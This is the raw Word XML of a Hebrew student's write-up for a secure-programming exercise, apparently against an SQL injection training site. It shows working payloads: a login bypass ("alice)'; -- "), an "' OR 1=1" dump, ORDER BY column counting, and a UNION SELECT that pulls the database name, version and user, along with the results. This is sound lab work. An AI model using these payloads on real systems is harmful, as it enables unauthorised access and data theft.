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329C" w14:textId="0F10BB48" w:rsidR="00FF5EF8" w:rsidRDefault="00D53CE4" w:rsidP="00D53CE4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D53CE4">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:t>תרגיל 1 בתכנות בטוח ואבטחת תקשוב</w:t>
      </w:r>
      <w:r w:rsidR="0019328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93285">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00193285">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אורי דאבוש 212945760</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F060B2" w14:textId="677EFC33" w:rsidR="00D53CE4" w:rsidRPr="00C91A8D" w:rsidRDefault="00D53CE4" w:rsidP="00D53CE4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8D">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:t>סעיף 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73394123" w14:textId="5DE39709" w:rsidR="00C91A8D" w:rsidRDefault="00C91A8D" w:rsidP="00C91A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נכנסתי לעמוד ההתחברות וראיתי 2 שדות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משתמש וסיסמא. ישר ניסיתי להכניס מחרוזת מהצורה</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB255A6" w14:textId="1DD3194A" w:rsidR="00C91A8D" w:rsidRDefault="00C91A8D" w:rsidP="00C91A8D">
      <w:pPr>
        <w:bidi w:val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"alice'; -- "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2615E6" w14:textId="7E4ECA96" w:rsidR="00C91A8D" w:rsidRDefault="00C91A8D" w:rsidP="00C91A8D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זה הביא לי את השגיאה הבאה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBED308" w14:textId="70073D82" w:rsidR="00C91A8D" w:rsidRDefault="00C91A8D" w:rsidP="00C91A8D">
      <w:pPr>
        <w:bidi w:val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Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; -- ') AND (password = 'd41d8cd98f00b204e9800998ecf8427e')' at line 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8E1478" w14:textId="01A340E6" w:rsidR="00C91A8D" w:rsidRPr="00C91A8D" w:rsidRDefault="00C91A8D" w:rsidP="00C91A8D">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8D">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>מהשגיאה הבנתי שכנראה שהתנאי בפקודה בשרת כתוב בערך בצורה הבאה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD68EE" w14:textId="7586922A" w:rsidR="00C91A8D" w:rsidRDefault="00BF202A" w:rsidP="00C91A8D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… </w:t>
      </w:r>
      <w:r w:rsidR="00C91A8D" w:rsidRPr="00C91A8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE (username = ' + </w:t>
      </w:r>
      <w:r w:rsidR="00C91A8D" w:rsidRPr="00C91A8D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username</w:t>
      </w:r>
      <w:r w:rsidR="00C91A8D" w:rsidRPr="00C91A8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> + ') AND (password = ' + hash(</w:t>
      </w:r>
      <w:r w:rsidR="00C91A8D" w:rsidRPr="00C91A8D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password</w:t>
      </w:r>
      <w:r w:rsidR="00C91A8D" w:rsidRPr="00C91A8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) + ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9F31DC" w14:textId="08A7FD73" w:rsidR="00C91A8D" w:rsidRDefault="00C91A8D" w:rsidP="00C91A8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ולכן השגיאה שקיבלתי הייתה שגיאת סינטקס (לא היה סוגר מתאים לסוגר של ה-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. לכן הוספתי את הסוגר וניסיתי את שם המשתמש הבא:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06246D6A" w14:textId="3D9CE185" w:rsidR="00C91A8D" w:rsidRDefault="00C91A8D" w:rsidP="00C91A8D">
      <w:pPr>
        <w:bidi w:val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"alice)'; -- "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46848288" w14:textId="3E270D2D" w:rsidR="00C91A8D" w:rsidRDefault="00C91A8D" w:rsidP="00C91A8D">
      <w:pPr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ואכן הצלחתי להתחבר למשתמש של </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="cs"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B313A55" w14:textId="53355C00" w:rsidR="00C14ADD" w:rsidRDefault="00C14ADD" w:rsidP="00C91A8D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11747DD" wp14:editId="07BACE6A">
            <wp:extent cx="5943600" cy="33807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D329" w14:textId="248D7DF8" w:rsidR="00C91A8D" w:rsidRDefault="00C91A8D" w:rsidP="00C91A8D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326552E" w14:textId="509EA77E" w:rsidR="00C14ADD" w:rsidRDefault="00C14ADD" w:rsidP="00C14ADD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18C682F" w14:textId="3285C3FE" w:rsidR="00C14ADD" w:rsidRDefault="00C14ADD" w:rsidP="00C14ADD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0BCB6EC" w14:textId="0CDF373C" w:rsidR="00C14ADD" w:rsidRDefault="00C14ADD" w:rsidP="00C14ADD">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right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14ADD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lastRenderedPageBreak/>
        <w:t>סעיף 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428F98A6" w14:textId="1A645E48" w:rsidR="005A1FFF" w:rsidRDefault="00F75AE2" w:rsidP="005A1FF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ראשית, </w:t>
      </w:r>
      <w:r w:rsidR="005A1FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ניסיתי לחפש דברים שונים. ניסיתי להכניס בשורת החיפוש </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B2F566" w14:textId="3056EA21" w:rsidR="005A1FFF" w:rsidRDefault="005A1FFF" w:rsidP="005A1FFF">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="005A1FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12341E38" w14:textId="62C1BC2F" w:rsidR="005A1FFF" w:rsidRDefault="005A1FFF" w:rsidP="005A1FFF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וזה אכן החזיר את כל השורות (לאחר מכן גיליתי שגם חיפוש של מחרוזת ריקה מחזיר את כל השורות).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5D5089" w14:textId="3FE75C1B" w:rsidR="005A1FFF" w:rsidRDefault="005A1FFF" w:rsidP="005A1FFF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C54476" wp14:editId="2768C646">
            <wp:extent cx="5943600" cy="3954780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B20" w14:textId="69232F3D" w:rsidR="00781FDA" w:rsidRPr="005A1FFF" w:rsidRDefault="005A1FFF" w:rsidP="005A1FF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לאחר מכן </w:t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>ניסיתי למצוא דרך בה ניתן להריץ פקודה כרצוני. לא הצלחתי להריץ פקודה לאחר ה-;, כלומר לשרשר פקודה נוספת לאחר הפקודה הנוכחית, לכן עברתי לנסות להשתמש ב-</w:t>
      </w:r>
      <w:r w:rsidR="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION</w:t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 xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1332F8EB" w14:textId="6FC0399C" w:rsidR="00F75AE2" w:rsidRDefault="00781FDA" w:rsidP="00F75AE2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21A158" wp14:editId="7579E4DD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4333875" cy="1460500"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635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r="22276" b="33348"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4333875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>כדי להשתמש ב-</w:t>
      </w:r>
      <w:r w:rsidR="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNI</w:t>
      </w:r>
      <w:r w:rsidR="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ON</w:t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 xml:space="preserve"> עליי לדעת כמה עמודות יש בטבלה. את זה ניתן לגלות בקלות בעזרת אופרטור </w:t>
      </w:r>
      <w:r w:rsidR="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ORDER BY</w:t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 xml:space="preserve"> (או בעזרת ניסוי וטעייה של </w:t>
      </w:r>
      <w:r w:rsidR="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION</w:t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>). בחרתי ב-</w:t>
      </w:r>
      <w:r w:rsidR="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r w:rsidR="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> וניסיתי למיין לפי מספר עמודה. האינדקסים 1-5 עבדו לי, וב-6 קיבלתי שגיאה, כך ידעתי שיש 5 עמודות (ככל הנראה מפתח ו-4 העמודות שמופיעות בטבלה).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C43D7DC" w14:textId="634C2CE4" w:rsidR="00F75AE2" w:rsidRDefault="00F75AE2" w:rsidP="00F75AE2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lastRenderedPageBreak/>
        <w:t xml:space="preserve">כעת, ניסיתי לקבל את </w:t>
      </w:r>
      <w:r w:rsidR="00781FDA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">שם מסד הנתונים, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הגרסה, ה</w:t>
      </w:r>
      <w:r w:rsidR="00781FDA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">משתמש הנוכחי בעזרת </w:t>
      </w:r>
      <w:r w:rsidR="00781FDA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidR="00781FDA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> עם הפקודה הבאה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EA4831" w14:textId="6E121F0A" w:rsidR="00F75AE2" w:rsidRDefault="00781FDA" w:rsidP="005A1FFF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' </w:t>
      </w:r>
      <w:r w:rsidR="00F75AE2" w:rsidRPr="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION (SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F75AE2" w:rsidRPr="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1,DATABASE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F75AE2" w:rsidRPr="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(),VERSION(),CURRENT_USER(),</w:t>
      </w:r>
      <w:r w:rsidR="00780B55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>USER()</w:t>
      </w:r>
      <w:r w:rsidR="00F75AE2" w:rsidRPr="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00F75AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C73BB16" w14:textId="260AFB82" w:rsidR="00781FDA" w:rsidRDefault="00781FDA" w:rsidP="00781FD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ה-1 מרפד את העמודות של התוצאה כך שיתאים לתוצאה שחוזרת מה-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT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הראשון. הגרש בהתחלה סוגר את הגרש שפותחת הפקודה הקיימת בשרת, כנראה שהיא משהו בסגנון</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2647B5" w14:textId="584B9011" w:rsidR="00781FDA" w:rsidRDefault="00BF202A" w:rsidP="00781FDA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… </w:t>
      </w:r>
      <w:r w:rsidR="00781FDA" w:rsidRPr="00C91A8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE </w:t>
      </w:r>
      <w:r w:rsidR="00781FDA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pname</w:t>
      </w:r>
      <w:r w:rsidR="00781FDA" w:rsidRPr="00C91A8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ' + </w:t>
      </w:r>
      <w:r w:rsidR="00781FD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name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D532343" w14:textId="6AAAFE57" w:rsidR="00781FDA" w:rsidRDefault="00BF202A" w:rsidP="00781FD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ולכן לאחר ההזרקה נקבל:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEC3AC1" w14:textId="58C924F4" w:rsidR="00BF202A" w:rsidRDefault="00BF202A" w:rsidP="00BF202A">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF202A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">.. WHERE pname = '' UNION (SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BF202A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1,DATABASE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BF202A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(),VERSION(),CURRENT_USER(),</w:t>
      </w:r>
      <w:r w:rsidR="00780B55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>USER()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF202A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>); -- ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F423D8" w14:textId="51726A11" w:rsidR="00EA4B18" w:rsidRDefault="00EA4B18" w:rsidP="00EA4B18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התוצאה שקיבלנו:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C004B" w14:textId="187C3F1E" w:rsidR="00780B55" w:rsidRDefault="00780B55" w:rsidP="00EA4B18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00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18E14EC" wp14:editId="6FC0EDE5">
            <wp:extent cx="5943600" cy="596265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8214" w14:textId="584A6D8C" w:rsidR="005A1FFF" w:rsidRPr="005A1FFF" w:rsidRDefault="005A1FFF" w:rsidP="00EA4B18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A1FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">לסיכום, מסד הנתונים נקרא </w:t>
      </w:r>
      <w:r w:rsidRPr="005A1FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqlitraining</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>, גרסת ה-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> היא 8.0.23, המשתמש הוא </w:t>
      </w:r>
      <w:r w:rsidRPr="005A1FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>weak</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> וה-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1FFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הוא 172.18.0.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376A314E" w14:textId="5773581C" w:rsidR="00DA5FD6" w:rsidRDefault="00DA5FD6" w:rsidP="00C14ADD">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B241664" w14:textId="7F8ADD02" w:rsidR="00C14ADD" w:rsidRDefault="00C14ADD" w:rsidP="00DA5FD6">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7952792C" w14:textId="760E6CC0" w:rsidR="00373C71" w:rsidRDefault="00373C71" w:rsidP="00F1421F">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226EF119" w14:textId="77777777" w:rsidR="00373C71" w:rsidRDefault="00373C71">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FE6FAA" w14:textId="20367BF6" w:rsidR="00F1421F" w:rsidRDefault="00373C71" w:rsidP="00373C71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373C71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lastRenderedPageBreak/>
        <w:t>סעיף 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E551F" w14:textId="73352F26" w:rsidR="00373C71" w:rsidRDefault="00F92E48" w:rsidP="00373C7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כעת עלינו לגלות מידע על משתמש, כלומר לגשת לטבלה של המשתמשים. לכן קודם עלינו לדעת את שם הטבלה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5EAA42" w14:textId="10C32D6D" w:rsidR="00F92E48" w:rsidRDefault="00F92E48" w:rsidP="00373C7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ניסיתי ליצור משתמש כדי לנסות להבין מה קורה, וקיבלתי שגיאה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170CB4E6" w14:textId="0A1211D6" w:rsidR="00F92E48" w:rsidRDefault="00F92E48" w:rsidP="00373C7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50FC71" wp14:editId="0FE84246">
            <wp:extent cx="5943600" cy="3042920"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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60FE" w14:textId="7F0815FD" w:rsidR="00F92E48" w:rsidRDefault="00F92E48" w:rsidP="00373C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כלומר גילינו ששם הטבלה הוא </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. קליל!</w:t>
      </w:r>
    </w:p>
